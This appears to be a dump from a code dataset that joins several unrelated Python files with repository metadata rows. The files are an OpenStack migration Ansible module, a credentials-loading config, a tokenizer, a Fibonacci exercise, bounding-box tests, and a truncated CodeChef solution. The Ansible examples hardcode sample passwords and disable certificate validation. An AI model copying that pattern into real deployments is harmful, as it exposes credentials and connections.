__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
---
module: import_workload_create_instance
short_description: Create NBD exports of OpenStack volumes
extends_documentation_fragment: openstack
version_added: "2.9.0"
author: "OpenStack tenant migration tools (@os-migrate)"
description:
- "Take an instance from an OS-Migrate YAML structure, and export its volumes over NBD."
options:
auth:
description:
- Dictionary with parameters for chosen auth type on the destination cloud.
required: true
type: dict
auth_type:
description:
- Auth type plugin for destination OpenStack cloud. Can be omitted if using password authentication.
required: false
type: str
region_name:
description:
- Destination OpenStack region name. Can be omitted if using default region.
required: false
type: str
availability_zone:
description:
- Availability zone.
required: false
type: str
cloud:
description:
- Ignored. Present for backwards compatibility.
required: false
type: raw
validate_certs:
description:
- Validate HTTPS certificates when logging in to OpenStack.
required: false
type: bool
data:
description:
- Data structure with server parameters as loaded from OS-Migrate workloads YAML file.
required: true
type: dict
block_device_mapping:
description:
- A block_device_mapping_v2 structure from the transfer_volumes module.
- Used to attach destination volumes to the new instance in the right order.
required: true
type: list
elements: dict
'''
EXAMPLES = '''
main.yml:
- name: validate loaded resources
os_migrate.os_migrate.validate_resource_files:
paths:
- "{{ os_migrate_data_dir }}/workloads.yml"
register: workloads_file_validation
when: import_workloads_validate_file
- name: read workloads resource file
os_migrate.os_migrate.read_resources:
path: "{{ os_migrate_data_dir }}/workloads.yml"
register: read_workloads
- name: get source conversion host address
os_migrate.os_migrate.os_conversion_host_info:
auth:
auth_url: https://src-osp:13000/v3
username: migrate
password: migrate
project_domain_id: default
project_name: migration-source
user_domain_id: default
server_id: ce4dda96-5d8e-4b67-aee2-9845cdc943fe
register: os_src_conversion_host_info
- name: get destination conversion host address
os_migrate.os_migrate.os_conversion_host_info:
auth:
auth_url: https://dest-osp:13000/v3
username: migrate
password: migrate
project_domain_id: default
project_name: migration-destination
user_domain_id: default
server_id: 2d2afe57-ace5-4187-8fca-5f10f9059ba1
register: os_dst_conversion_host_info
- name: import workloads
include_tasks: workload.yml
loop: "{{ read_workloads.resources }}"
workload.yml:
- block:
- name: preliminary setup for workload import
os_migrate.os_migrate.import_workload_prelim:
auth:
auth_url: https://dest-osp:13000/v3
username: migrate
password: migrate
project_domain_id: default
project_name: migration-destination
user_domain_id: default
validate_certs: False
src_conversion_host: "{{ os_src_conversion_host_info.openstack_conversion_host }}"
src_auth:
auth_url: https://src-osp:13000/v3
username: migrate
password: migrate
project_domain_id: default
project_name: migration-source
user_domain_id: default
src_validate_certs: False
data: "{{ item }}"
data_dir: "{{ os_migrate_data_dir }}"
register: prelim
- debug:
msg:
- "{{ prelim.server_name }} log file: {{ prelim.log_file }}"
- "{{ prelim.server_name }} progress file: {{ prelim.state_file }}"
when: prelim.changed
- name: expose source volumes
os_migrate.os_migrate.import_workload_export_volumes:
auth: "{{ os_migrate_src_auth }}"
auth_type: "{{ os_migrate_src_auth_type|default(omit) }}"
region_name: "{{ os_migrate_src_region_name|default(omit) }}"
validate_certs: "{{ os_migrate_src_validate_certs|default(omit) }}"
ca_cert: "{{ os_migrate_src_ca_cert|default(omit) }}"
client_cert: "{{ os_migrate_src_client_cert|default(omit) }}"
client_key: "{{ os_migrate_src_client_key|default(omit) }}"
conversion_host:
"{{ os_src_conversion_host_info.openstack_conversion_host }}"
data: "{{ item }}"
log_file: "{{ os_migrate_data_dir }}/{{ prelim.server_name }}.log"
state_file: "{{ os_migrate_data_dir }}/{{ prelim.server_name }}.state"
ssh_key_path: "{{ os_migrate_conversion_keypair_private_path }}"
register: exports
when: prelim.changed
- name: transfer volumes to destination
os_migrate.os_migrate.import_workload_transfer_volumes:
auth: "{{ os_migrate_dst_auth }}"
auth_type: "{{ os_migrate_dst_auth_type|default(omit) }}"
region_name: "{{ os_migrate_dst_region_name|default(omit) }}"
validate_certs: "{{ os_migrate_dst_validate_certs|default(omit) }}"
ca_cert: "{{ os_migrate_dst_ca_cert|default(omit) }}"
client_cert: "{{ os_migrate_dst_client_cert|default(omit) }}"
client_key: "{{ os_migrate_dst_client_key|default(omit) }}"
data: "{{ item }}"
conversion_host:
"{{ os_dst_conversion_host_info.openstack_conversion_host }}"
ssh_key_path: "{{ os_migrate_conversion_keypair_private_path }}"
transfer_uuid: "{{ exports.transfer_uuid }}"
src_conversion_host_address:
"{{ os_src_conversion_host_info.openstack_conversion_host.address }}"
volume_map: "{{ exports.volume_map }}"
state_file: "{{ os_migrate_data_dir }}/{{ prelim.server_name }}.state"
log_file: "{{ os_migrate_data_dir }}/{{ prelim.server_name }}.log"
register: transfer
when: prelim.changed
- name: create destination instance
os_migrate.os_migrate.import_workload_create_instance:
auth: "{{ os_migrate_dst_auth }}"
auth_type: "{{ os_migrate_dst_auth_type|default(omit) }}"
region_name: "{{ os_migrate_dst_region_name|default(omit) }}"
validate_certs: "{{ os_migrate_dst_validate_certs|default(omit) }}"
ca_cert: "{{ os_migrate_dst_ca_cert|default(omit) }}"
client_cert: "{{ os_migrate_dst_client_cert|default(omit) }}"
client_key: "{{ os_migrate_dst_client_key|default(omit) }}"
data: "{{ item }}"
block_device_mapping: "{{ transfer.block_device_mapping }}"
register: os_migrate_destination_instance
when: prelim.changed
rescue:
- fail:
msg: "Failed to import {{ item.params.name }}!"
'''
RETURN = '''
server_id:
description: The ID of the newly created server.
returned: On successful creation of migrated server on destination cloud.
type: str
sample: 059635b7-451f-4a64-978a-7c2e9e4c15ff
'''
from ansible.module_utils.basic import AnsibleModule
# Import openstack module utils from ansible_collections.openstack.cloud.plugins as per ansible 3+
try:
from ansible_collections.openstack.cloud.plugins.module_utils.openstack \
import openstack_full_argument_spec, openstack_cloud_from_module
except ImportError:
# If this fails fall back to ansible < 3 imports
from ansible.module_utils.openstack \
import openstack_full_argument_spec, openstack_cloud_from_module
from ansible_collections.os_migrate.os_migrate.plugins.module_utils import server
def run_module():
argument_spec = openstack_full_argument_spec(
auth=dict(type='dict', no_log=True, required=True),
data=dict(type='dict', required=True),
block_device_mapping=dict(type='list', required=True, elements='dict'),
)
result = dict(
changed=False,
)
module = AnsibleModule(
argument_spec=argument_spec,
)
sdk, conn = openstack_cloud_from_module(module)
block_device_mapping = module.params['block_device_mapping']
ser_server = server.Server.from_data(module.params['data'])
sdk_server = ser_server.create(conn, block_device_mapping)
# Some info (e.g. flavor ID) will only become available after the
# server is in ACTIVE state, we need to wait for it.
sdk_server = conn.compute.wait_for_server(sdk_server, failures=['ERROR'], wait=600)
dst_ser_server = server.Server.from_sdk(conn, sdk_server)
if sdk_server:
result['changed'] = True
result['server'] = dst_ser_server.data
result['server_id'] = sdk_server.id
module.exit_json(**result)
def main():
run_module()
if __name__ == '__main__':
main()
| 33.152416 | 106 | 0.703185 | 1,107 | 8,918 | 5.331527 | 0.219512 | 0.079295 | 0.028465 | 0.027448 | 0.41918 | 0.39207 | 0.346154 | 0.333955 | 0.293121 | 0.277194 | 0 | 0.012731 | 0.198475 | 8,918 | 268 | 107 | 33.276119 | 0.812955 | 0.030837 | 0 | 0.394619 | 0 | 0 | 0.813846 | 0.221463 | 0 | 0 | 0 | 0 | 0 | 1 | 0.008969 | false | 0.022422 | 0.067265 | 0 | 0.076233 | 0.004484 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
81e620b1dfd869927a5135342a7294ba02276c08 | 1,183 | py | Python | src/config.py | BRAVO68WEB/architus | 21b9f94a64b142ee6e9b5efd79bd872a13ce8f6a | [
"MIT"
] | null | null | null | src/config.py | BRAVO68WEB/architus | 21b9f94a64b142ee6e9b5efd79bd872a13ce8f6a | [
"MIT"
] | null | null | null | src/config.py | BRAVO68WEB/architus | 21b9f94a64b142ee6e9b5efd79bd872a13ce8f6a | [
"MIT"
] | null | null | null | from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
# from src.commands import *
# import src.commands as command_modules
secret_token = None
db_user = None
db_pass = None
sessions = {}
try:
lines = [line.rstrip('\n') for line in open('.secret_token')]
secret_token = lines[0]
db_user = lines[1]
db_pass = lines[2]
client_id = lines[3]
client_secret = lines[4]
twitter_consumer_key = lines[5]
twitter_consumer_secret = lines[6]
twitter_access_token_key = lines[7]
twitter_access_token_secret = lines[8]
scraper_token = lines[9]
except Exception as e:
print(e)
print('error reading .secret_token, make it you aut')
def get_session(pid=None):
if pid in sessions:
return sessions[pid]
print("creating postgres session")
try:
engine = create_engine("postgresql://{}:{}@localhost/autbot".format(db_user, db_pass))
Session = sessionmaker(bind=engine)
session = Session()
sessions[pid] = session
except Exception as e:
session = None
print('failed to connect to database')
print(e)
return session
session = get_session()
| 25.170213 | 94 | 0.674556 | 158 | 1,183 | 4.873418 | 0.449367 | 0.057143 | 0.046753 | 0.046753 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010917 | 0.225697 | 1,183 | 46 | 95 | 25.717391 | 0.829694 | 0.054945 | 0 | 0.166667 | 0 | 0 | 0.132735 | 0.03139 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027778 | false | 0.083333 | 0.055556 | 0 | 0.138889 | 0.138889 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
c48c8a45a8bc31ea98b3b0eb49ac12298185c634 | 2,426 | py | Python | kenlm_training/cc_net/tokenizer.py | ruinunca/data_tooling | 297e1f8c2898d00b523ccafb7bdd19c6d6aac9ff | [
"Apache-2.0"
] | 435 | 2019-11-04T22:35:50.000Z | 2022-03-29T20:15:07.000Z | kenlm_training/cc_net/tokenizer.py | ruinunca/data_tooling | 297e1f8c2898d00b523ccafb7bdd19c6d6aac9ff | [
"Apache-2.0"
] | 331 | 2021-11-02T00:30:56.000Z | 2022-03-08T16:48:13.000Z | kenlm_training/cc_net/tokenizer.py | ruinunca/data_tooling | 297e1f8c2898d00b523ccafb7bdd19c6d6aac9ff | [
"Apache-2.0"
] | 66 | 2019-11-06T01:28:12.000Z | 2022-03-01T09:18:32.000Z | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
import time
from typing import Dict, Optional
import sacremoses # type: ignore
from cc_net import jsonql, text_normalizer
class RobustTokenizer(jsonql.Transformer):
"""Moses tokenizer with the expected preprocessing."""
LANG_WITHOUT_ACCENT = {"en", "my"}
def __init__(self, lang: str):
super().__init__()
self.lang = lang
self.moses = sacremoses.MosesTokenizer(lang)
self.rm_accent = lang in self.LANG_WITHOUT_ACCENT
self.ready = True
def do(self, text: str):
text = text_normalizer.normalize(
text, accent=self.rm_accent, case=False, numbers=False, punct=True
)
text = text_normalizer.normalize_spacing_for_tok(text, language=self.lang)
return self.moses.tokenize(text, return_str=True, escape=False)
class DocTokenizer(jsonql.Transformer):
"""Tokenize the text found in `output_field and store the result in `output_field`."""
def __init__(
self,
field: str,
output_field: str = "tokenized",
language_field: str = "language",
):
super().__init__()
self.field = field
self.output_field = output_field
self.language_field = language_field
self.n_docs = 0
self.tokenizers: Dict[str, RobustTokenizer] = {}
def get_tokenizer(self, lang: str) -> Optional[RobustTokenizer]:
cache = self.tokenizers
if lang in cache:
return cache[lang]
if lang in ("th", "zh", "ja"):
# TODO find a tokenizer for those languages
return None
cache[lang] = RobustTokenizer(lang)
return cache[lang]
def do(self, document):
lang = document[self.language_field]
tok = self.get_tokenizer(lang)
if not tok:
return document
self.n_docs += 1
lines = document[self.field].split("\n")
tokenized = "\n".join(tok(l) for l in lines)
document[self.output_field] = tokenized
return document
def summary(self):
delay = (time.time() - self.start_time) / 3600
speed = self.n_docs / delay
return [
f"Tokenized {self.n_docs:_} documents in {delay:.2}h ({speed:.1} doc/s)."
]
| 30.325 | 90 | 0.626958 | 300 | 2,426 | 4.91 | 0.373333 | 0.044807 | 0.02444 | 0.03666 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004525 | 0.271228 | 2,426 | 79 | 91 | 30.708861 | 0.82862 | 0.145919 | 0 | 0.109091 | 0 | 0.018182 | 0.049148 | 0 | 0 | 0 | 0 | 0.012658 | 0 | 1 | 0.109091 | false | 0 | 0.072727 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c48caf2d700cbc3c512434c652a6ac5a08e2206b | 346 | py | Python | scripts/exercicios/ex063.py | RuanBarretodosSantos/python | 4142ccd71c4ffb4bb6a10d61c85f612758f5bb41 | [
"MIT"
] | null | null | null | scripts/exercicios/ex063.py | RuanBarretodosSantos/python | 4142ccd71c4ffb4bb6a10d61c85f612758f5bb41 | [
"MIT"
] | null | null | null | scripts/exercicios/ex063.py | RuanBarretodosSantos/python | 4142ccd71c4ffb4bb6a10d61c85f612758f5bb41 | [
"MIT"
] | null | null | null | cont = 3
t1 = 0
t2 = 1
print('-----' * 12)
print('Sequência de Fibonacci')
print('-----' * 12)
valor = int(input('Quantos termos você quer mostrar ? '))
print('~~~~~' * 12)
print(f'{t1} ➙ {t2} ' , end='➙ ')
while cont <= valor:
t3 = t1 + t2
print(f' {t3}', end=' ➙ ')
t1 = t2
t2 = t3
t3 = t1
cont += 1
print(' F I M')
| 19.222222 | 57 | 0.482659 | 54 | 346 | 3.148148 | 0.481481 | 0.123529 | 0.141176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.095618 | 0.274566 | 346 | 17 | 58 | 20.352941 | 0.569721 | 0 | 0 | 0.117647 | 0 | 0 | 0.291908 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.411765 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
c4930d25761ee9d797224e253c155e8643ca0fdb | 14,588 | py | Python | geometry_utils/tests/test_bound_box.py | NOAA-ORR-ERD/geometry_utils | 0417a8c459fb17f101945f53d048191dc22e97c0 | [
"BSD-3-Clause"
] | null | null | null | geometry_utils/tests/test_bound_box.py | NOAA-ORR-ERD/geometry_utils | 0417a8c459fb17f101945f53d048191dc22e97c0 | [
"BSD-3-Clause"
] | null | null | null | geometry_utils/tests/test_bound_box.py | NOAA-ORR-ERD/geometry_utils | 0417a8c459fb17f101945f53d048191dc22e97c0 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
"""
Test code for the BBox Object
"""
import numpy as np
import pytest
from geometry_utils.bound_box import (BBox,
asBBox,
NullBBox,
InfBBox,
fromBBArray,
from_points,
)
class TestConstructors():
def test_creates(self):
B = BBox(((0, 0), (5, 5)))
assert isinstance(B, BBox)
def test_type(self):
B = np.array(((0, 0), (5, 5)))
assert not isinstance(B, BBox)
def testDataType(self):
B = BBox(((0, 0), (5, 5)))
assert B.dtype == np.float
def testShape(self):
B = BBox((0, 0, 5, 5))
assert B.shape == (2, 2)
def testShape2(self):
with pytest.raises(ValueError):
BBox((0, 0, 5))
def testShape3(self):
with pytest.raises(ValueError):
BBox((0, 0, 5, 6, 7))
def testArrayConstruction(self):
A = np.array(((4, 5), (10, 12)), np.float_)
B = BBox(A)
assert isinstance(B, BBox)
def testMinMax(self):
with pytest.raises(ValueError):
BBox((0, 0, -1, 6))
def testMinMax2(self):
with pytest.raises(ValueError):
BBox((0, 0, 1, -6))
def testMinMax3(self):
# OK to have a zero-sized BB
B = BBox(((0, 0), (0, 5)))
assert isinstance(B, BBox)
def testMinMax4(self):
# OK to have a zero-sized BB
B = BBox(((10., -34), (10., -34.0)))
assert isinstance(B, BBox)
def testMinMax5(self):
# OK to have a tiny BB
B = BBox(((0, 0), (1e-20, 5)))
assert isinstance(B, BBox)
def testMinMax6(self):
# Should catch tiny difference
with pytest.raises(ValueError):
BBox(((0, 0), (-1e-20, 5)))
class TestAsBBox():
def testPassThrough(self):
B = BBox(((0, 0), (5, 5)))
C = asBBox(B)
assert B is C
def testPassThrough2(self):
B = ((0, 0), (5, 5))
C = asBBox(B)
assert B is not C
def testPassArray(self):
# Different data type
A = np.array(((0, 0), (5, 5)))
C = asBBox(A)
assert A is not C
def testPassArray2(self):
# same data type -- should be a view
A = np.array(((0, 0), (5, 5)), np.float_)
C = asBBox(A)
A[0, 0] = -10
assert C[0, 0] == A[0, 0]
class TestIntersect():
def testSame(self):
B = BBox(((-23.5, 456), (56, 532.0)))
C = BBox(((-23.5, 456), (56, 532.0)))
assert B.Overlaps(C)
def testUpperLeft(self):
B = BBox(((5, 10), (15, 25)))
C = BBox(((0, 12), (10, 32.0)))
assert B.Overlaps(C)
def testUpperRight(self):
B = BBox(((5, 10), (15, 25)))
C = BBox(((12, 12), (25, 32.0)))
assert B.Overlaps(C)
def testLowerRight(self):
B = BBox(((5, 10), (15, 25)))
C = BBox(((12, 5), (25, 15)))
assert B.Overlaps(C)
def testLowerLeft(self):
B = BBox(((5, 10), (15, 25)))
C = BBox(((-10, 5), (8.5, 15)))
assert B.Overlaps(C)
def testBelow(self):
B = BBox(((5, 10), (15, 25)))
C = BBox(((-10, 5), (8.5, 9.2)))
assert not B.Overlaps(C)
def testAbove(self):
B = BBox(((5, 10), (15, 25)))
C = BBox(((-10, 25.001), (8.5, 32)))
assert not B.Overlaps(C)
def testLeft(self):
B = BBox(((5, 10), (15, 25)))
C = BBox(((4, 8), (4.95, 32)))
assert not B.Overlaps(C)
def testRight(self):
B = BBox(((5, 10), (15, 25)))
C = BBox(((17.1, 8), (17.95, 32)))
assert not B.Overlaps(C)
def testInside(self):
B = BBox(((-15, -25), (-5, -10)))
C = BBox(((-12, -22), (-6, -8)))
assert B.Overlaps(C)
def testOutside(self):
B = BBox(((-15, -25), (-5, -10)))
C = BBox(((-17, -26), (3, 0)))
assert B.Overlaps(C)
def testTouch(self):
B = BBox(((5, 10), (15, 25)))
C = BBox(((15, 8), (17.95, 32)))
assert B.Overlaps(C)
def testCorner(self):
B = BBox(((5, 10), (15, 25)))
C = BBox(((15, 25), (17.95, 32)))
assert B.Overlaps(C)
def testZeroSize(self):
B = BBox(((5, 10), (15, 25)))
C = BBox(((15, 25), (15, 25)))
assert B.Overlaps(C)
def testZeroSize2(self):
B = BBox(((5, 10), (5, 10)))
C = BBox(((15, 25), (15, 25)))
assert not B.Overlaps(C)
def testZeroSize3(self):
B = BBox(((5, 10), (5, 10)))
C = BBox(((0, 8), (10, 12)))
assert B.Overlaps(C)
def testZeroSize4(self):
B = BBox(((5, 1), (10, 25)))
C = BBox(((8, 8), (8, 8)))
assert B.Overlaps(C)
class TestEquality():
def testSame(self):
B = BBox(((1.0, 2.0), (5., 10.)))
C = BBox(((1.0, 2.0), (5., 10.)))
assert B == C
def testIdentical(self):
B = BBox(((1.0, 2.0), (5., 10.)))
assert B == B
def testNotSame(self):
B = BBox(((1.0, 2.0), (5., 10.)))
C = BBox(((1.0, 2.0), (5., 10.1)))
assert not B == C
def testWithArray(self):
B = BBox(((1.0, 2.0), (5., 10.)))
C = np.array(((1.0, 2.0), (5., 10.)))
assert B == C
def testWithArray2(self):
B = BBox(((1.0, 2.0), (5., 10.)))
C = np.array(((1.0, 2.0), (5., 10.)))
assert C == B
def testWithArray3(self):
B = BBox(((1.0, 2.0), (5., 10.)))
C = np.array(((1.01, 2.0), (5., 10.)))
assert not C == B
class TestInside():
def testSame(self):
B = BBox(((1.0, 2.0), (5., 10.)))
C = BBox(((1.0, 2.0), (5., 10.)))
assert B.Inside(C)
def testPoint(self):
B = BBox(((1.0, 2.0), (5., 10.)))
C = BBox(((3.0, 4.0), (3.0, 4.0)))
assert B.Inside(C)
def testPointOutside(self):
B = BBox(((1.0, 2.0), (5., 10.)))
C = BBox(((-3.0, 4.0), (0.10, 4.0)))
assert not B.Inside(C)
def testUpperLeft(self):
B = BBox(((5, 10), (15, 25)))
C = BBox(((0, 12), (10, 32.0)))
assert not B.Inside(C)
def testUpperRight(self):
B = BBox(((5, 10), (15, 25)))
C = BBox(((12, 12), (25, 32.0)))
assert not B.Inside(C)
def testLowerRight(self):
B = BBox(((5, 10), (15, 25)))
C = BBox(((12, 5), (25, 15)))
assert not B.Inside(C)
def testLowerLeft(self):
B = BBox(((5, 10), (15, 25)))
C = BBox(((-10, 5), (8.5, 15)))
assert not (B.Inside(C))
def testBelow(self):
B = BBox(((5, 10), (15, 25)))
C = BBox(((-10, 5), (8.5, 9.2)))
assert not (B.Inside(C))
def testAbove(self):
B = BBox(((5, 10), (15, 25)))
C = BBox(((-10, 25.001), (8.5, 32)))
assert not (B.Inside(C))
def testLeft(self):
B = BBox(((5, 10), (15, 25)))
C = BBox(((4, 8), (4.95, 32)))
assert not (B.Inside(C))
def testRight(self):
B = BBox(((5, 10), (15, 25)))
C = BBox(((17.1, 8), (17.95, 32)))
assert not (B.Inside(C))
class TestPointInside():
def testPointIn(self):
B = BBox(((1.0, 2.0), (5., 10.)))
P = (3.0, 4.0)
assert (B.PointInside(P))
def testUpperLeft(self):
B = BBox(((5, 10), (15, 25)))
P = (4, 30)
assert not (B.PointInside(P))
def testUpperRight(self):
B = BBox(((5, 10), (15, 25)))
P = (16, 30)
assert not (B.PointInside(P))
def testLowerRight(self):
B = BBox(((5, 10), (15, 25)))
P = (16, 4)
assert not (B.PointInside(P))
def testLowerLeft(self):
B = BBox(((5, 10), (15, 25)))
P = (-10, 5)
assert not (B.PointInside(P))
def testBelow(self):
B = BBox(((5, 10), (15, 25)))
P = (10, 5)
assert not (B.PointInside(P))
def testAbove(self):
B = BBox(((5, 10), (15, 25)))
P = (10, 25.001)
assert not (B.PointInside(P))
def testLeft(self):
B = BBox(((5, 10), (15, 25)))
P = (4, 12)
assert not (B.PointInside(P))
def testRight(self):
B = BBox(((5, 10), (15, 25)))
P = (17.1, 12.3)
assert not (B.PointInside(P))
def testPointOnTopLine(self):
B = BBox(((1.0, 2.0), (5., 10.)))
P = (3.0, 10.)
assert (B.PointInside(P))
def testPointLeftTopLine(self):
B = BBox(((1.0, 2.0), (5., 10.)))
P = (-3.0, 10.)
assert not (B.PointInside(P))
def testPointOnBottomLine(self):
B = BBox(((1.0, 2.0), (5., 10.)))
P = (3.0, 5.)
assert (B.PointInside(P))
def testPointOnLeft(self):
B = BBox(((-10., -10.), (-1.0, -1.0)))
P = (-10, -5.)
assert (B.PointInside(P))
def testPointOnRight(self):
B = BBox(((-10., -10.), (-1.0, -1.0)))
P = (-1, -5.)
assert (B.PointInside(P))
def testPointOnBottomRight(self):
B = BBox(((-10., -10.), (-1.0, -1.0)))
P = (-1, -10.)
assert (B.PointInside(P))
class Test_from_points():
def testCreate(self):
Pts = np.array(((5, 2), (3, 4), (1, 6)), np.float64)
B = from_points(Pts)
assert (B[0, 0] == 1.0 and
B[0, 1] == 2.0 and
B[1, 0] == 5.0 and
B[1, 1] == 6.0)
def testCreateInts(self):
Pts = np.array(((5, 2), (3, 4), (1, 6)))
B = from_points(Pts)
assert (B[0, 0] == 1.0 and
B[0, 1] == 2.0 and
B[1, 0] == 5.0 and
B[1, 1] == 6.0)
def testSinglePoint(self):
Pts = np.array((5, 2), np.float_)
B = from_points(Pts)
assert (B[0, 0] == 5. and
B[0, 1] == 2.0 and
B[1, 0] == 5. and
B[1, 1] == 2.0)
def testListTuples(self):
Pts = [(3, 6.5), (13, 43.2), (-4.32, -4), (65, -23), (-0.0001,
23.432)]
B = from_points(Pts)
assert (B[0, 0] == -4.32 and
B[0, 1] == -23.0 and
B[1, 0] == 65.0 and
B[1, 1] == 43.2)
class TestMerge():
A = BBox(((-23.5, 456), (56, 532.0)))
B = BBox(((-20.3, 460), (54, 465))) # B should be completely inside A
C = BBox(((-23.5, 456), (58, 540.))) # up and to the right or A
D = BBox(((-26.5, 12), (56, 532.0)))
def testInside(self):
C = self.A.copy()
C.Merge(self.B)
assert (C == self.A)
def testFullOutside(self):
C = self.B.copy()
C.Merge(self.A)
assert (C == self.A)
def testUpRight(self):
A = self.A.copy()
A.Merge(self.C)
assert (A[0] == self.A[0] and A[1] == self.C[1])
def testDownLeft(self):
A = self.A.copy()
A.Merge(self.D)
assert (A[0] == self.D[0] and A[1] == self.A[1])
class TestWidthHeight():
B = BBox(((1.0, 2.0), (5., 10.)))
def testWidth(self):
assert (self.B.Width == 4.0)
def testWidth2(self):
assert (self.B.Height == 8.0)
def testSetW(self):
with pytest.raises(AttributeError):
self.B.Height = 6
def testSetH(self):
with pytest.raises(AttributeError):
self.B.Width = 6
class TestCenter():
B = BBox(((1.0, 2.0), (5., 10.)))
def testCenter(self):
assert ((self.B.Center == (3.0, 6.0)).all())
def testSetCenter(self):
with pytest.raises(AttributeError):
self.B.Center = (6, 5)
class TestBBarray():
BBarray = np.array((((-23.5, 456), (56, 532.0)), ((-20.3, 460),
(54, 465)), ((-23.5, 456), (58, 540.)), ((-26.5,
12), (56, 532.0))), dtype=np.float)
BB = asBBox(((-26.5, 12.), (58., 540.)))
def testJoin(self):
BB = fromBBArray(self.BBarray)
assert BB == self.BB
class TestNullBBox():
B1 = NullBBox()
B2 = NullBBox()
B3 = BBox(((1.0, 2.0), (5., 10.)))
def testValues(self):
assert (np.alltrue(np.isnan(self.B1)))
def testIsNull(self):
assert (self.B1.IsNull)
def testEquals(self):
assert ((self.B1 == self.B2) is True)
def testNotEquals(self):
assert not self.B1 == self.B3
def testNotEquals2(self):
assert not self.B3 == self.B1
def testMerge(self):
C = self.B1.copy()
C.Merge(self.B3)
assert C == self.B3, 'merge failed, got: %s' % C
def testOverlaps(self):
assert self.B1.Overlaps(self.B3) is False
def testOverlaps2(self):
assert self.B3.Overlaps(self.B1) is False
class TestInfBBox():
B1 = InfBBox()
B2 = InfBBox()
B3 = BBox(((1.0, 2.0), (5., 10.)))
NB = NullBBox()
def testValues(self):
assert (np.alltrue(np.isinf(self.B1)))
# def testIsNull(self):
# assert ( self.B1.IsNull )
def testEquals(self):
assert self.B1 == self.B2
def testNotEquals(self):
assert not self.B1 == self.B3
def testNotEquals2(self):
assert self.B1 != self.B3
def testNotEquals3(self):
assert not self.B3 == self.B1
def testMerge(self):
C = self.B1.copy()
C.Merge(self.B3)
assert C == self.B2, 'merge failed, got: %s' % C
def testMerge2(self):
C = self.B3.copy()
C.Merge(self.B1)
assert C == self.B1, 'merge failed, got: %s' % C
def testOverlaps(self):
assert (self.B1.Overlaps(self.B2) is True)
def testOverlaps2(self):
assert (self.B3.Overlaps(self.B1) is True)
def testOverlaps3(self):
assert (self.B1.Overlaps(self.B3) is True)
def testOverlaps4(self):
assert (self.B1.Overlaps(self.NB) is True)
def testOverlaps5(self):
assert (self.NB.Overlaps(self.B1) is True)
class TestSides():
B = BBox(((1.0, 2.0), (5., 10.)))
def testLeft(self):
assert self.B.Left == 1.0
def testRight(self):
assert self.B.Right == 5.0
def testBottom(self):
assert self.B.Bottom == 2.0
def testTop(self):
assert self.B.Top == 10.0
class TestAsPoly():
B = BBox(((5, 0), (10, 20)))
corners = np.array([(5., 0.), (5., 20.), (10., 20.), (10., 0.)],
dtype=np.float64)
def testCorners(self):
print(self.B.AsPoly())
assert np.array_equal(self.B.AsPoly(), self.corners)
| 25.151724 | 75 | 0.466822 | 2,088 | 14,588 | 3.25431 | 0.108238 | 0.050773 | 0.070199 | 0.04415 | 0.661221 | 0.601619 | 0.530979 | 0.464901 | 0.425313 | 0.354673 | 0 | 0.115067 | 0.335755 | 14,588 | 579 | 76 | 25.195164 | 0.586171 | 0.02221 | 0 | 0.501199 | 0 | 0 | 0.004422 | 0 | 0 | 0 | 0 | 0 | 0.235012 | 1 | 0.254197 | false | 0.009592 | 0.007194 | 0 | 0.340528 | 0.002398 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c49d9514c95f15c6be6ba6695dcb54d27f071828 | 347 | py | Python | CodeChef/Contest/June Long/pricecon.py | GSri30/Competetive_programming | 0dc1681500a80b6f0979d0dc9f749357ee07bcb8 | [
"MIT"
] | 22 | 2020-01-03T17:32:00.000Z | 2021-11-07T09:31:44.000Z | CodeChef/Contest/June Long/pricecon.py | GSri30/Competetive_programming | 0dc1681500a80b6f0979d0dc9f749357ee07bcb8 | [
"MIT"
] | 10 | 2020-09-30T09:41:18.000Z | 2020-10-11T11:25:09.000Z | CodeChef/Contest/June Long/pricecon.py | GSri30/Competetive_programming | 0dc1681500a80b6f0979d0dc9f749357ee07bcb8 | [
"MIT"
] | 25 | 2019-10-14T19:25:01.000Z | 2021-05-26T08:12:20.000Z | test = int(input())
while test > 0 :
n,k = map(int,input().split())
p = list(map(int,input().split()))
original = 0
later = 0
for i in p :
if i > k :
later += k
original += i
else :
later += i
original += i
